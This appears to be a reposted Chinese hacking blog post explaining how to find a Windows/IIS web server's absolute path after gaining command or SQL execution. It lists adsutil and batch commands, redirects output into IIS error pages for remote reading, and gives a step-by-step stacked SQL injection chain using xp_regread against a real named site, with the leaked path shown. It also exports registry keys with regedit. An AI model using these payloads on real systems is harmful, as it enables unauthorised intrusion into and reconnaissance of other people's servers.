专注于互联网--专注于架构

最新标签
网站地图
文章索引
Rss订阅

首页 »安全 » 绝对路径:查看WEB绝对路径目录命令 »正文

绝对路径:查看WEB绝对路径目录命令

来源: 发布时间:星期四, 2009年9月10日 浏览:3次 评论:0
 ·查看WEB绝对路径目录命令     -|风尘浪子 发表于 2005-12-15 13:27:48 
 
查看WEB网站WebSite安装目录命令:
     cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc/2/root >c:\test1.txt (将2换成1、3、4、5试试)
type c:\test1.txt
del c:\test1.txt
在NBSI下可以直接显示运行结果所以不用导出到文件

2)在网站WebSite上随便找到个图片名字 123.jpg
然后写进批处理123.bat:
d:
dir 123.jpg /s >c:\123.txt
e:
dir 123.jpg /s >>c:\123.txt
f:
dir 123.jpg /s >>c:\123.txt

执行后 type c:\123.txt
这样来分析网站WebSite路径

3)SQL服务器和网站WebSite服务器在同个服务器上好了是可以执行命令是吧?
将执行命令输出结果到
%windir%\help\iishelp\common\404b.htm或者500.asp
注意输出前Backup这两个文件
如:
dir c:\ >%windir%\help\iishelp\common\404b.htm
然后随便输入个文件来访问:http://目标ip/2.asp

4)针对win2000系统:
xp_regread读取HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots 获取WEB路径
2003系统:未找到利用思路方法
如:
(1)     新建个表cyfd(字段为gyfd):http://www.cnwill.com/NewsShow.aspx?id=4844;create table [dbo].[cyfd]([gyfd][char](255))--
(2)     把web路径写进去:http://www.cnwill.com/NewsShow.aspx?id=4844;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert o cyfd (gyfd) values(@result);--
(3)     还是让他不匹配显示:http://www.cnwill.com/NewsShow.aspx?id=4844 and 1=(select count(*) from cyfd where gyfd >1)
Source: .Net SqlClient Data Provider
Description: 将 varchar 值 'Y:\Web\烟台人才热线后台管理系统,,201 ' 转换为数据类型为 列时发生语法
TargeSite: Boolean Read 哈哈哈路径暴露了
(4)接下来删除表:http://www.cnwill.com/NewsShow.aspx?id=4844;drop table cyfd;--

5)用regedit命令导出注册表将导出结果保存路径到%windir%\help\iishelp\common\404b.htm或者500.asp页面
regedit命令介绍说明:
Regedit /L:system /R:user /E filename.reg Regpath
参数含义:
/L:system指定.dat文件所在路径
/R:user指定User.dat文件所在路径
/E:此参数指定注册表编辑器要进行导出注册表操作在此参数后面空输入导出注册表文件名
Regpath:用来指定要导出哪个注册表分支如果不指定则将导出全部注册表分支在这些参数中"/L:system"和"/R:user"参数是可选项如果不使用这两个参数注册表编辑器则认为是对WINDOWS目录下"system.dat"和"user.dat"文件进行操作如果是通过从软盘启动并进入DOS那么就必须使用"/L"和"/R"参数来指定"system.dat"和"user.dat"文件具体路径否则注册表编辑器将无法找到它们比如说如果通过启动盘进入DOS则备份注册表命令是"Regedit /L:C:\windows\/R:C:\windows\/e regedit.reg",该命令意思是把整个注册表备份到WINDOWS目录下其文件名为"regedit.reg"而如果输入是"regedit /E D:\regedit.reg"这条命令则是说把整个注册表备份到D盘根目录下(省略了"/L"和"/R"参数)其文件名为"Regedit.reg"

regedit /s c:\adam.reg 导入c:\adam.reg文件至注册表
regedit /e c:\web.reg 备份全部注册内容到c:\web.reg中
针对win2000系统:C:\>regedit /e %windir%\help\iishelp\common\404b.htm "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots"
然后http://目标IP/2.asp
针对win2003系统:没有找到希望找到朋友公布出来起讨论 
 



  • 篇文章: 挂网页马几个思路方法

  • 篇文章: 国外黑客技术:用IExpress打造“免检”木马
  • 0

    相关文章

    读者评论

    发表评论

    • 昵称:
    • 内容: